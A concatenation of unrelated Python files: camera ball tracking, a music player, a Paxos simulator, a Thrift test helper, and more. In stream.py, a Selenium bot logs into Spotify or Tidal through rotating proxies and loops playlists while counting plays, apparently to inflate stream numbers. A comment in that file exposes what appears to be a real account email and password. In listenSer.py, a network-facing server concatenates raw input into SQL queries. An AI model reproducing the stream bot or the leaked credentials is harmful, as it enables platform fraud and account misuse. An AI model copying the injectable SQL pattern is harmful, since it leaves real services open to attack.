player.play_file("klodia.ply")
player.play_file("lightofhumanity.ply")
player.play_file("ningchi.ply")
player.play_file("astronomia.ply")
player.play_file("railgun_piano.ply")
player.play_file("level5.ply")
player.play_file("faded.ply")
player.play_file("myHeartWillGoOn.ply")
player.play_file("qianbenying.ply")
player.play_file("one_punch.ply")
player.play_file("nextToYou.ply")
player.play_file("tail.ply")
player.play_file("bird.ply")
player.play_file("sisterNoise.ply")
player.play_file("tanzilang.ply")
player.play_file("railgun.ply")
player.play_file("canon_1.ply")
player.play_file("west.ply")
player.play_file("xiaozhiqu.ply")
# player.play_section(player.parse_section(
# "0 0 ..2 0 | 0_.6 ..1_..3 .5 0_-_..1_.7|..1_6 .1_.3 .2 0_-_.1_.7|0_-_6.._3. 1_3._1._6.. 0_-_4.._1. 6._1._6.._4..[ins=99]"))
player.close()
|
ThreadImage.py
|
from threading import Lock, Thread
from time import sleep
import threading
import pyzed.sl as sl
import time
import cv2
import numpy as np
import imutils
def load_image_into_numpy_array(image):
ar = image.get_data()
ar = ar[:, :, 0:3]
(im_height, im_width, channels) = image.get_data().shape
return np.array(ar).reshape((im_height, im_width, 3)).astype(np.uint8)
width = 2560
height = 720
image_np_global = np.zeros([width, height, 3], dtype=np.uint8)
new_data = False
exit_signal = False
def FetchDataFunc():
global image_np_global, exit_signal, new_data
image_np_global = np.zeros([width, height, 3], dtype=np.uint8)
zed = sl.Camera()
input_type = sl.InputType()
init_params = sl.InitParameters(input_t=input_type)
init_params.camera_resolution = sl.RESOLUTION.HD720
init_params.camera_fps = 60
init_params.svo_real_time_mode = True
err = zed.open(init_params)
print(err)
while err != sl.ERROR_CODE.SUCCESS:
err = zed.open(init_params)
print(err)
time.sleep(1)
image_mat = sl.Mat()
runtime_parameters = sl.RuntimeParameters()
image_size = sl.Resolution(width, height)
while not exit_signal:
if zed.grab(runtime_parameters) == sl.ERROR_CODE.SUCCESS:
zed.retrieve_image(image_mat, sl.VIEW.SIDE_BY_SIDE, resolution=image_size)
threadLock.acquire()
image_np_global = load_image_into_numpy_array(image_mat)
new_data = True
threadLock.release()
time.sleep(0.01)
print('I have get the data.')
zed.close()
threadLock = threading.Lock()
def main():
global image_np_global, exit_signal, new_data
capture_thread = Thread(target=FetchDataFunc)
capture_thread.start()
print('Das ist Main process.')
while not exit_signal:
if new_data == True:
threadLock.acquire()
gray = cv2.cvtColor(image_np_global, cv2.COLOR_BGR2GRAY)
new_data = False
threadLock.release()
# Add the image process.
LeftImage = image_np_global[0:720, 0:1280]
RightImage = image_np_global[0:720, 1280:2560]
Leftblurred = cv2.GaussianBlur(LeftImage, (11, 11), 0)
Rightblurred = cv2.GaussianBlur(RightImage, (11, 11), 0)
Lefthsv = cv2.cvtColor(Leftblurred, cv2.COLOR_BGR2HSV)
Righthsv = cv2.cvtColor(Rightblurred, cv2.COLOR_BGR2HSV)
greenLower = (29, 86, 6)
greenUpper = (64, 255, 255)
Leftmask = cv2.inRange(Lefthsv, greenLower, greenUpper)
Rightmask = cv2.inRange(Righthsv, greenLower, greenUpper)
Leftmask = cv2.erode(Leftmask, None, iterations=2)
Rightmask = cv2.erode(Rightmask, None, iterations=2)
Leftmask = cv2.dilate(Leftmask, None, iterations=2)
Rightmask = cv2.dilate(Rightmask, None, iterations=2)
Lcnts = cv2.findContours(Leftmask.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
Lcnts = imutils.grab_contours(Lcnts)
Rcnts = cv2.findContours(Rightmask.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
Rcnts = imutils.grab_contours(Rcnts)
Lcenter = None
Rcenter = None
# only proceed if at least one contour was found
if len(Lcnts) > 0 and len(Rcnts) > 0:
# find the largest contour in the mask, then use
# it to compute the minimum enclosing circle and
# centroid
Lc = max(Lcnts, key=cv2.contourArea)
Rc = max(Rcnts, key=cv2.contourArea)
((Lx, Ly), Lradius) = cv2.minEnclosingCircle(Lc)
((Rx, Ry), Rradius) = cv2.minEnclosingCircle(Rc)
LM = cv2.moments(Lc)
RM = cv2.moments(Rc)
Lcenter = (int(LM["m10"] / LM["m00"]), int(LM["m01"] / LM["m00"]))
Rcenter = (int(RM["m10"] / RM["m00"]), int(RM["m01"] / RM["m00"]))
# only proceed if the radius meets a minimum size
if Lradius > 10 and Rradius > 10:
# draw the circle and centroid on the frame,
# then update the list of tracked points
cv2.circle(LeftImage, (int(Lx), int(Ly)), int(Lradius),
(0, 255, 255), 2)
cv2.circle(LeftImage, Lcenter, 5, (0, 0, 255), -1)
cv2.circle(RightImage, (int(Rx), int(Ry)), int(Rradius),
(0, 255, 255), 2)
cv2.circle(RightImage, Rcenter, 5, (0, 0, 255), -1)
cv2.imshow('LeftImage', LeftImage)
cv2.imshow('RightImage', RightImage)
if cv2.waitKey(1) == ord('q'):
cv2.destroyAllWindows()
exit_signal = True
break
else:
sleep(0.01)
exit_signal = True
capture_thread.join()
if __name__ == '__main__':
main()
|
listenSer.py
|
'''
**************************************************
* 智能体监听模块 *
* *
* 1. 监听智能体控制器设置请求 *
* 2. 循环处理任务队列中的任务 *
* 3. 接收请求并执行 *
* *
* author: joliu<joliu@s-an.org> *
* date: 2018-3-21 *
**************************************************
'''
import socket
import threading
import socketserver
import json
import os
import time
import subprocess
import logging
import sqlite3
# 两种控制模式,controller:控制器写入控制命令,device:接收其他传感器控制命令
controlModeList = ['controller', 'device']
controlMethodList = ['add', 'rm', 'clear', 'period', 'show']
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
'''
消息监听模块
'''
def handle(self):
# 设备忙碌标识
busyFlag = False
# 错误标识
errorFlag = False
try:
# 接收socket消息
data = self.request.recv(1024).decode()
except socket.error as err_msg:
# 返回异常信息
(status, output) = (-1, err_msg)
# 异常处理
print("recv error!")
exit(1)
message = data.split('&')
# 检测控制模式
controlMode = message[0]
print(message)
if controlMode in controlModeList:
if controlMode == "controller":
# 写入控制命令到任务队
print(message[1])
command = message[1]
# 检测是否是合法操作
if not command in controlMethodList:
print("error: illegal command")
errorFlag = True
(status, output) = (-1, "illegal controller command: %s" % command)
else:
# 匹配控制指令做出相应操作
(status, output) = executeCommand(command, message[2:])
# 监听来自device hfv模块的控制请求
elif controlMode == "device":
command = message[1]
# 发送控制请求
(status, output) = sendCommandToDevice(command)
# (status, output) = (1, "test")
else:
pass
else:
print("illegal controlMode")
(status, output) = (-1, 'illegal controlMode')
errorFlag = True
# 返回控制命令执行结果
jresp = json.dumps((status, str(output)))
try:
self.request.sendall(jresp.encode())
except socket.error as err_msg:
print("socket failed %s" % err_msg)
exit(1)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
# 发送控制指令到Device
def sendCommandToDevice(cmd):
# 通过容器的环境变量HOST获取绑定传感器的IP地址
ip, port = os.getenv('HOST'), 8085
return sendBySocket(ip, port, cmd)
# 通过socket发送信息
def sendBySocket(ip, port, cmd):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as err_msg:
print("Error creating socket:%s" % err_msg)
s.close()
return (-1, err_msg)
try:
s.connect((ip, port))
except socket.error as err_msg:
print("Address-related error connecting to server: %s" % err_msg)
s.close()
return (-1, err_msg)
print("****************send:" + cmd)
try:
s.sendall(cmd.encode())
except socket.error as err_msg:
print("Error sending data: %s" % err_msg)
s.close()
return (-1, err_msg)
try:
response = s.recv(1024).decode()
print(response)
except socket.error as err_msg:
print("Error receiving data: %s" % err_msg)
s.close()
return (-1, err_msg)
print(str(response))
s.close()
# 程序运行正常返回目标传感器返回的数据
return (1, str(response))
# 执行控制指令
def executeCommand(command, information):
if command == "add":
# 目前假设information就是全部控制指令
task = information[0]
ctime = information[1]
print("****************")
print(task)
print(ctime)
(status, output) = insertDB(task, ctime)
print(output)
elif command == "clear":
# 清空任务队列
(status, output) = clearDB()
elif command == "period":
ctime = information[0]
# 设置查询循环周期
(status, output) = updatePeriod(ctime)
elif command == "show":
(status, output) = showDB()
print(output)
else:
# 可能由于更新可执行任务列表,而未实现功能导致的问题
(status, output) = (-1, "method isn't ready")
return (status, output)
# 创建数据库
def createDB():
conn = sqlite3.connect("task.db")
cursor = conn.cursor()
cursor.execute("""CREATE TABLE if not exists task
(cmd text, hashtext text, ctime int(5))
""")
conn.commit()
cursor.close()
conn.close()
# 设置时间周期
def updatePeriod(cTime):
try:
sql = 'update task set ctime=' + str(cTime)
conn = sqlite3.connect("task.db")
cursor = conn.cursor()
cursor.execute(sql)
conn.commit()
(status, output) = (1, cTime)
except sqlite3.Error as err_msg:
print("Database error: %s", err_msg)
(status, output) = (-1, err_msg)
except Exception as err_msg:
(status, output) = (-1, err_msg)
finally:
cursor.close()
conn.close()
return (status, output)
# 插入任务到数据库
def insertDB(task, ctime):
try:
hashtext = str(time.time()).split(".")[1]
sql = "insert into task values ('" + task + "', '" + hashtext + "', " + ctime + ")"
conn = sqlite3.connect("task.db")
cursor = conn.cursor()
cursor.execute(sql)
conn.commit()
(status, output) = (1, hashtext)
except sqlite3.Error as err_msg:
print("Database error: %s", err_msg)
(status, output) = (-1, err_msg)
except Exception as err_msg:
(status, output) = (-1, err_msg)
finally:
cursor.close()
conn.close()
return (status, output)
# 清空数据库
def clearDB():
try:
conn = sqlite3.connect("task.db")
cursor = conn.cursor()
cursor.execute("delete from task")
conn.commit()
(status, output) = (-1, "delete success")
except sqlite3.Error as err_msg:
print("Database error: %s", err_msg)
(status, output) = (-1, err_msg)
except Exception.Error as err_msg:
(status, output) = (-1, err_msg)
finally:
cursor.close()
conn.close()
return (status, output)
# 展示数据库内容
def showDB():
try:
conn = sqlite3.connect("task.db")
cursor = conn.cursor()
cursor.execute("select * from task")
data = cursor.fetchall()
if data is None:
(status, output) = (1, 0)
else:
(status, output) = (1, data)
except sqlite3.Error as err_msg:
(status, output) = (-1, err_msg)
except Exception.Error as err_msg:
(status, output) = (-1, err_msg)
finally:
cursor.close()
conn.close()
return (status, output)
if __name__ == "__main__":
createDB()
# 设置host和port
HOST, PORT = "0.0.0.0", 3000
logger = logging.getLogger("TCPServer")
logger.setLevel(logging.INFO)
# 创建句柄
fh = logging.FileHandler("1.log")
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s -\
%(message)s')
# 添加句柄到logger类
logger.addHandler(fh)
logger.info("Program started")
socketserver.TCPServer.allow_reuse_address = True
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
# 启动多进程监听服务
server_thread = threading.Thread(target=server.serve_forever)
# 当主进程中断时退出程序
server_thread.daemon = True
server_thread.start()
logger.info("Server loop running in thread:" + server_thread.name)
logger.info("....waiting for connection")
# 使用control + C 退出程序
server.serve_forever()
|
runKeywordAsync.py
|
import sys
import os
import time
from robot.libraries.BuiltIn import BuiltIn
from robot.output.logger import LOGGER
class runKeywordAsync:
def __init__(self):
self._thread_pool = {}
self._last_thread_handle = 1
#self._robot_log_level = BuiltIn().get_variable_value("${LOG_LEVEL}")
def run_method_async(self, keyword, *args, **kwargs):
#BuiltIn().set_log_level("NONE")
handle = self._last_thread_handle
thread = self._threaded_method(keyword, *args, **kwargs)
thread.start()
self._thread_pool[handle] = thread
self._last_thread_handle += 1
return handle
def run_keyword_async(self, keyword, *args):
#BuiltIn().set_log_level("NONE")
handle = self._last_thread_handle
thread = self._threaded(keyword, *args)
thread.start()
self._thread_pool[handle] = thread
self._last_thread_handle += 1
return handle
def wait_async_all(self, timeout=60):
timeout = int(timeout)
results = []
for thread in self._thread_pool:
try:
result = self._thread_pool[thread].result_queue.get(True, timeout)
results.append(result)
except:
#BuiltIn().set_log_level(self._robot_log_level)
for thread in self._thread_pool:
self._thread_pool[thread].terminate()
raise Exception("Process " + str(thread) + " Failed")
#BuiltIn().set_log_level(self._robot_log_level)
self._thread_pool = {}
self._last_thread_handle = 1
return results
def get_async_return(self, handle, timeout=60):
timeout = int(timeout)
if handle in self._thread_pool:
try:
result = self._thread_pool[handle].result_queue.get(True, timeout)
del self._thread_pool[handle]
BuiltIn().set_log_level(self._robot_log_level)
return result
except:
raise Exception("Process " + str(handle) + " Failed")
else:
raise Exception("Passed Process id " + str(handle) + " is not a valid id")
def _threaded_method(self, keyword, *args, **kwargs):
from multiprocessing import Queue
from multiprocessing import Process
def wrapped_f(q, *args, **kwargs):
''' Calls the decorated function and puts the result in a queue '''
ret = BuiltIn().call_method(keyword, *args, **kwargs)
q.put(ret)
q = Queue()
th = Process(target=wrapped_f, args=(q,)+args, kwargs=kwargs)
th.result_queue = q
return th
def _threaded(self, keyword, *args):
from multiprocessing import Queue
from multiprocessing import Process
def wrapped_f(q, *args):
''' Calls the decorated function and puts the result in a queue '''
LOGGER.unregister_xml_logger()
ret = BuiltIn().run_keyword(keyword, *args)
q.put(ret)
globals()['wrapped_f']=wrapped_f
q = Queue()
th = Process(target=wrapped_f, args=(q,)+args)
th.result_queue = q
return th
|
stream.py
|
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from threading import Thread
import time
import string, random, zipfile
import var
import db
class bot():
def __init__(self, ip, id):
self.id = id
PROXY_HOST = ip
PROXY_PORT = var.proxy_port
PROXY_USER = var.proxy_user
PROXY_PASS = var.proxy_pass
print(PROXY_HOST, PROXY_PORT, PROXY_USER, PROXY_PASS)
manifest_json = """
{
"version": "1.0.0",
"manifest_version": 2,
"name": "Chrome Proxy",
"permissions": [
"proxy",
"tabs",
"unlimitedStorage",
"storage",
"<all_urls>",
"webRequest",
"webRequestBlocking"
],
"background": {
"scripts": ["background.js"]
},
"minimum_chrome_version":"22.0.0"
}
"""
background_js = """
var config = {
mode: "fixed_servers",
rules: {
singleProxy: {
scheme: "http",
host: "%(host)s",
port: parseInt(%(port)d)
},
bypassList: ["foobar.com"]
}
};
chrome.proxy.settings.set({value: config, scope: "regular"}, function() {});
function callbackFn(details) {
return {
authCredentials: {
username: "%(user)s",
password: "%(pass)s"
}
};
}
chrome.webRequest.onAuthRequired.addListener(
callbackFn,
{urls: ["<all_urls>"]},
['blocking']
);
""" % {
"host": PROXY_HOST,
"port": PROXY_PORT,
"user": PROXY_USER,
"pass": PROXY_PASS,
}
pluginfile = 'proxy_auth_plugin.zip'
with zipfile.ZipFile(pluginfile, 'w') as zp:
zp.writestr("manifest.json", manifest_json)
zp.writestr("background.js", background_js)
co = Options()
co.add_argument("--start-maximized")
co.add_extension(pluginfile)
self.timeOut = 30
self.spotify_link = "https://accounts.spotify.com/en/login/"
self.tidal_link = "https://listen.tidal.com/login"
self.test_link = "http://lumtest.com/myip.json"
# ----- without image ----- (uncomment this)
prefs = {"profile.managed_default_content_settings.images": 2}
co.add_experimental_option("prefs", prefs)
self.driver = webdriver.Chrome(executable_path='chromedriver', chrome_options=co)
self.driver.get(self.test_link)
Thread(target=self.stop,daemon=True).start()
Thread(target=self.stop_all,daemon=True).start()
WebDriverWait(self.driver, self.timeOut).until(EC.visibility_of_element_located((By.TAG_NAME, "body")))
self.driver.maximize_window()
def login_spotify(self, email, password):
count = 0
while count<10:
try:
count+=1
self.driver.get(self.spotify_link)
WebDriverWait(self.driver, self.timeOut).until(EC.visibility_of_element_located((By.ID, "login-username")))
self.driver.find_element_by_id("login-username").send_keys(email + Keys.TAB + password + Keys.ENTER)
WebDriverWait(self.driver, self.timeOut).until(EC.visibility_of_element_located((By.TAG_NAME, "body")))
time.sleep(10)
break
except:
continue
def stream_spotify(self, link, id):
try:
self.driver.get(link)
time.sleep(var.time_duration+5)
conn = db.db_ceate()
conn.update_count(id)
conn.close()
except Exception as e:
print("Exeception occured at stream {} :{} ".format(self.id, e))
def login_tidal(self, email, password):
count = 0
while count<10:
try:
count+=1
self.driver.get(self.tidal_link)
WebDriverWait(self.driver, self.timeOut).until(EC.visibility_of_element_located((By.CLASS_NAME, "login-facebook")))
self.driver.find_element_by_class_name("login-facebook").click()
WebDriverWait(self.driver, self.timeOut).until(EC.visibility_of_element_located((By.ID, "email")))
self.driver.find_element_by_id("email").send_keys(email + Keys.TAB + password + Keys.ENTER)
WebDriverWait(self.driver, self.timeOut).until(EC.visibility_of_element_located((By.TAG_NAME, "body")))
time.sleep(10)
break
except:
continue
def stream_tidal(self, link, id):
try:
self.driver.get(link)
xpath = "/html/body/div[2]/div/div/div/div[1]/div[2]/main/div[1]/div[2]/div/div[1]/span/div/header/div[2]/div[2]/button[1]"
WebDriverWait(self.driver, self.timeOut).until(EC.visibility_of_element_located((By.XPATH, xpath)))
self.driver.find_element_by_xpath(xpath).click()
time.sleep(2)
time.sleep(var.time_duration+5)
conn = db.db_ceate()
conn.update_count(id)
conn.close()
except Exception as e:
print("Exeception occured at stream {} :{} ".format(self.id, e))
def stop(self):
while True:
time.sleep(1)
if var.stop == True and self.id in var.stop_list:
try:
print("Stop - {}".format(self.id))
self.driver.quit()
except Exception as e:
print("Exeception occured at stop :{}".format(e))
finally:
break
def stop_all(self):
while True:
time.sleep(1)
if var.stop_all == True:
try:
print("Stop All - {}".format(self.id))
self.driver.quit()
except Exception as e:
print("Exeception occured at stop all :{}".format(e))
finally:
break
def main(id, username, password, playlist, proxy_ip, site):
stream = bot(proxy_ip, id)
conn = db.db_ceate()
songs = conn.get_playlist(playlist)
conn.close()
if site == "spotify":
stream.login_spotify(username, password)
while True:
try:
print("big loop {}".format(id))
for item in songs:
print("lil loop {}".format(id))
if (var.stop_all == True) or (var.stop == True and id in var.stop_list):
break
else:
print(id, username, proxy_ip, item[2])
stream.stream_spotify(item[2], item[0])
if (var.stop_all == True) or (var.stop == True and id in var.stop_list):
break
time.sleep(1)
except Exception as e:
print("Exeception occured at stream loop :{}".format(e))
break
else:
stream.login_tidal(username, password)
while True:
try:
print("big loop {}".format(id))
for item in songs:
print("lil loop {}".format(id))
if (var.stop_all == True) or (var.stop == True and id in var.stop_list):
break
else:
print(id, username, proxy_ip, item[2])
stream.stream_tidal(item[2], item[0])
if (var.stop_all == True) or (var.stop == True and id in var.stop_list):
break
time.sleep(1)
except Exception as e:
print("Exeception occured at stream loop :{}".format(e))
break
print("Exiting {}".format(id))
if __name__ == "__main__":
# temp = bot()
# temp.login_spotify("nathan.johnson@billionaireminded.com", "WillieB1@1")
pass
|
threading.py
|
#!/usr/bin/env python3
from threading import *
from mylib.easy.common import T
def ez_thread_factory(group=None, name=None, daemon=None):
def new_thread(target: T.Callable, *args, **kwargs):
return Thread(group=group, target=target, name=name, args=args, kwargs=kwargs, daemon=daemon)
return new_thread
|
TCppServerTestManager.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import threading
from thrift.Thrift import TProcessor
from thrift.server.TCppServer import TCppServer
class TCppServerTestManager(object):
"""
A context manager for running a TCppServer in unit tests.
Caller may pass either an Iface, a Processor, or a not-running TCppServer.
Basic example:
from mylib import MyServiceHandler
from thrift.util.TCppServerTestManager import TCppServerTestManager
class MyServiceTest(unittest.TestCase)
def test_traffic(self):
handler = MyServiceHandler() # derived from MyService.Iface
with TCppServerTestManager(handler) as server:
host, port = server.addr()
# Talk to the server using thrift in here....
See the unit-tests for this class for better-worked-out examples.
"""
@staticmethod
def make_server(processor):
"""
Creates a TCppServer given a processor. This is the function used
internally, but it may be of interest separately as well.
"""
server = TCppServer(processor)
server.setPort(0)
server.setNumCPUWorkerThreads(1)
server.setNumIOWorkerThreads(1)
server.setNewSimpleThreadManager(
count=1,
pendingTaskCountMax=5,
enableTaskStats=False
)
return server
def __init__(self, obj, cleanUp=True):
self.__obj = obj
self.__handler = None
self.__processor = None
self.__server = None
self.__thread = None
self.__thread_started_ev = None
self.__do_cleanup = cleanUp
def __enter__(self):
self.start()
return self
def __exit__(self, type, value, traceback):
self.stop()
def start(self):
"""
Starts the server in another thread.
Returns after the server has bound to and listened on its port. Callers
may immediately open connections without needing to wait or poll.
"""
if self.__is_handler(self.__obj):
self.__handler = self.__obj
self.__processor = self.__make_processor(self.__handler)
self.__server = self.__make_server(self.__processor)
elif self.__is_processor(self.__obj):
self.__processor = self.__obj
self.__server = self.__make_server(self.__processor)
elif self.__is_server(self.__obj):
self.__server = self.__obj
else:
raise Exception("Not a handler, a processor, or a server.")
self.__server_started_ev = threading.Event()
self.__thread = threading.Thread(target=self.__serve)
self.__thread.start()
self.__server_started_ev.wait()
self.__server_started_ev = None
def stop(self):
"""
Stops the server.
Returns after the server has been stopped and all resources have been
cleaned up.
"""
self.__server.stop()
self.__thread.join()
self.__thread = None
self.__server = None
self.__processor = None
self.__handler = None
def addr(self):
"""
Returns a pair of host-addr and port on which the running server is
listening.
If constructed with a handler or a processor, addr is * or :: and port
is ephemeral.
"""
addr = self.__server.getAddress()
return addr[0], addr[1]
def __serve(self):
self.__server.setup()
self.__server_started_ev.set()
try:
self.__server.loop()
finally:
if self.__do_cleanup:
self.__server.cleanUp()
def __is_handler(self, obj):
return hasattr(obj, '_processor_type') \
and not self.__is_processor(obj)
def __is_processor(self, obj):
return isinstance(obj, TProcessor)
def __is_server(self, obj):
return isinstance(obj, TCppServer)
def __make_processor(self, handler):
return handler._processor_type(handler)
def __make_server(self, processor):
return self.__class__.make_server(self.__processor)
|
sim.py
|
from collections import defaultdict
from multiprocessing import Process, Queue, JoinableQueue
import queue
from threading import Thread
import time
from paxos import Proposer, Acceptor, Learner, BaseSystem
class Mailbox:
"""
Provides messaging functionality for a paxos system instance.
"""
def __init__(self, config):
self.config = config
self.funnel = Queue()
self.inbox = [Queue() for i in range(config.num_processes)]
self.message_count = 0
# Two flags, active to signal when we haven't received any messages
# for timeout_interval seconds, and terminate to signal when we have
# been asked to shutdown by the System.
self.active = True
self.terminate = False
# If don't receive any messages in this amount of time, then shutdown.
self.timeout_interval = 3 * self.config.message_timeout
# Time stamp of the last seen message, used together with
# timeout_interval to determine when the mailbox should shutdown.
self.last_seen = None
def run(self):
print("Mailbox started")
while True:
if not self.active and self.terminate:
break
if self.active and self.last_seen and (time.time() - self.last_seen) > self.timeout_interval:
self.active = False
# Take messages off the funnel and deliver them to the appropriate
# process.
try:
dest, msg = self.funnel.get(timeout=0.5)
self.last_seen = time.time()
except queue.Empty:
pass
else:
self.inbox[dest].put(msg)
print("Mailbox shutting down")
def send(self, to, msg):
"""
Send msg to process id ``to``.
"""
# Funnel all messages through a primary queue so that we can keep track
# of when we are done (i.e. all messages are processed).
self.message_count += 1
self.funnel.put((to, msg))
def recv(self, from_):
"""
Receive (blocking) msg destined for process id ``from_``.
"""
return self.inbox[from_].get()
def task_done(self, pid):
"""
Inform pid's queue that it has processed a task.
Called by agents when they are done processing a message, and used by
the queue instance to know when all messages have been processed.
"""
self.funnel.task_done()
def join(self):
"""
Block until all messages have finished processing and we haven't had
any messages for a while (i.e. active set to False).
"""
while self.active:
time.sleep(0.5)
# Don't join funnel queue because there's a good chance that it will
# never be fully exhausted due to heart beat messages.
#self.funnel.join()
def shutdown(self):
"""
Perform any shutdown actions prior to quitting. In this base Mailbox
class this is just a hook that isn't used.
"""
pass
def quit(self):
self.terminate = True
class ResultLogger:
"""
Class to hold log of results from each learner process.
"""
def __init__(self, config):
self.config = config
self.queue = Queue()
self.active = True
# Results, PID mapped to list of decided values.
self.results = defaultdict(dict)
def run(self):
print("Logger started")
while True:
if not self.active and self.queue.empty():
break
try:
source, instance, value = self.queue.get(timeout=0.5)
except queue.Empty:
pass
else:
if source == "quit":
self.active = False
else:
self.results[source][instance] = value
print("Logger shutting down")
def log_result(self, source, instance, value):
self.queue.put((source, instance, value))
def print_results(self):
print("Process Result Log:")
processes = sorted(self.results.keys())
for pid in processes:
instances = range(1, self.config.num_test_requests + 1)
results = [(instance, self.results[pid].get(instance))
for instance in instances]
print(" {}: {}".format(pid, results))
def check_results(self):
"""
Check that each learner process got the same results in the same order.
Return False if there is a result list that is not the same. If all
results are the same, then return the list of results.
"""
results = list(self.results.values())
compare_list = results[0]
result = True
for result_list in results[1:]:
if result_list != compare_list:
result = False
print("Logger results consistent:", result)
return result
def get_summary_data(self):
return ResultSummary(self)
def print_summary(self):
summary = self.get_summary_data()
summary.print_summary()
class ResultSummary:
"""
Given a logger object, summarize its results.
"""
def __init__(self, logger):
self.logger = logger
self.instances = range(1, self.logger.config.num_test_requests + 1)
self.pids = self.logger.config.learner_ids
self.calculate()
def calculate(self):
self.calculate_missing()
self.calculate_consistency()
def calculate_missing(self):
self.learned_values = 0
self.missing_values = 0
self.total_values = 0
for i in self.instances:
for pid in self.pids:
value = self.logger.results[pid].get(i)
self.total_values += 1
if value is None:
self.missing_values += 1
else:
self.learned_values += 1
self.learned_values_percent = float(100) * self.learned_values / self.total_values
self.missing_values_percent = float(100) * self.missing_values / self.total_values
def calculate_consistency(self):
"""
Count the number of consistent and inconsistent instance results,
excluding unlearned or missing values.
"""
# Disjoint set: good and bad (consistent and inconsistent) instances.
self.good_instances = 0
self.bad_instances = 0
# Disjoint set: empty, incomplete, and complete instances representing
# no, some, or all learners learned the value.
self.empty_instances = 0
self.incomplete_instances = 0
self.complete_instances = 0
for i in self.instances:
values = set()
num_none = 0
for pid in self.pids:
value = self.logger.results[pid].get(i)
if value is None:
num_none += 1
else:
values.add(value)
length = len(values)
if length == 0:
self.good_instances += 1
self.empty_instances += 1
elif length == 1:
if num_none == 0:
self.complete_instances += 1
else:
self.incomplete_instances += 1
self.good_instances += 1
else:
self.bad_instances += 1
self.good_instances_percent = float(100) * self.good_instances / len(self.instances)
self.bad_instances_percent = float(100) * self.bad_instances / len(self.instances)
self.empty_instances_percent = float(100) * self.empty_instances / len(self.instances)
self.incomplete_instances_percent = float(100) * self.incomplete_instances / len(self.instances)
self.complete_instances_percent = float(100) * self.complete_instances / len(self.instances)
def get_summary_headings(self):
return [
"learned values", "learned values percent",
"missing values", "missing_values_percent",
"total_values",
"good_instances", "good_instances_percent",
"bad_instances", "bad_instances_percent",
"empty_instances", "empty_instances_percent",
"incomplete_instances", "incomplete_instances_percent",
"complete_instances", "complete_instances_percent",
"total instances",
]
def get_summary_data(self):
return [
self.learned_values, self.learned_values_percent,
self.missing_values, self.missing_values_percent,
self.total_values,
self.good_instances, self.good_instances_percent,
self.bad_instances, self.bad_instances_percent,
self.empty_instances, self.empty_instances_percent,
self.incomplete_instances, self.incomplete_instances_percent,
self.complete_instances, self.complete_instances_percent,
len(self.instances),
]
def print_summary(self):
print(self.get_summary_data())
print("""\
Values:
Learned: {:>6} {:>6.1f}%
Missing: {:>6} {:>6.1f}%
=======================
Total: {:>6}
Instances:
Consistent: {:>6} {:>6.1f}%
Inconsistent: {:>6} {:>6.1f}%
--------------------------
Empty: {:>6} {:>6.1f}%
Incomplete: {:>6} {:>6.1f}%
Complete: {:>6} {:>6.1f}%
==========================
Total: {:>6}
""".format(*self.get_summary_data()))
def log_summary(self):
import os
filename = 'log.txt'
print_headings = not os.path.exists(filename)
with open(filename, 'a') as f:
if print_headings:
f.write('\t'.join(self.get_summary_headings()))
f.write('\t'.join(self.get_summary_data()))
class System(BaseSystem):
"""
Class for simulating a network of paxos agents.
"""
def __init__(self, config, mailbox=None):
"""
``mailbox`` should be a mailbox class; if None, then use default
Mailbox class.
"""
print("System starting...")
self.config = config
# Set up mailbox and logger before launching agent processes so that
# the agent processes will have access to them.
if mailbox:
mailbox_class = mailbox
else:
mailbox_class = Mailbox
self.mailbox = mailbox_class(config)
self.mailbox_process = Thread(target=self.mailbox.run, name="System Mailbox")
self.mailbox_process.start()
# Start the logger thread.
self.logger = ResultLogger(config)
self.logger_process = Thread(target=self.logger.run, name="System Logger")
self.logger_process.start()
self.processes = self.launch_processes()
def launch_processes(self):
"""
Launch ``number`` number of processes of the given ``agent_class``,
using the given Mailbox instance and with process id starting with the
given ``pid`` and incrementing for each process spawned.
Return the incremented pid value when done, which is meant to be used
in subsequent calls to this method for a starting pid.
"""
processes = []
for pid, agent_class in self.config.process_list():
agent = agent_class(pid, self.mailbox, self.logger)
p = Process(target=agent.run)
p.start()
processes.append(p)
return processes
def join(self):
"""
Join with all processes that have been launched.
"""
for process in self.processes:
process.join()
def start(self):
"""
Start the system by sending a message to each process containing
this system object.
"""
for x in range(len(self.processes)):
self.mailbox.send(x, self.config)
def shutdown_agents(self):
"""
Wait for all mailbox messages to be processed, then send quit messages
to all processes and join with all processes. This will block until
all agents have terminated.
"""
print("System waiting for mailbox to go inactive...")
# Sleep a bit to allow any actions based on timeouts to fire.
#time.sleep(10)
self.mailbox.join()
print("System shutting down agents...")
for x in range(len(self.processes)):
self.mailbox.send(x, "quit")
self.join()
def quit(self):
self.logger.log_result("quit", None, None)
self.logger_process.join()
self.mailbox.quit()
self.mailbox_process.join()
print("System terminated.")
|
oledui-nightly.py
|
#!/usr/bin/python
from __future__ import unicode_literals
import requests
import os
import sys
import time
import json
import pycurl
import pprint
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
from time import*
from threading import Thread
from socketIO_client import SocketIO
from datetime import datetime
from io import BytesIO
# Imports for OLED display
from luma.core.interface.serial import spi
from luma.oled.device import ssd1322
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from modules.pushbutton import PushButton
from modules.rotaryencoder import RotaryEncoder
from modules.display import *
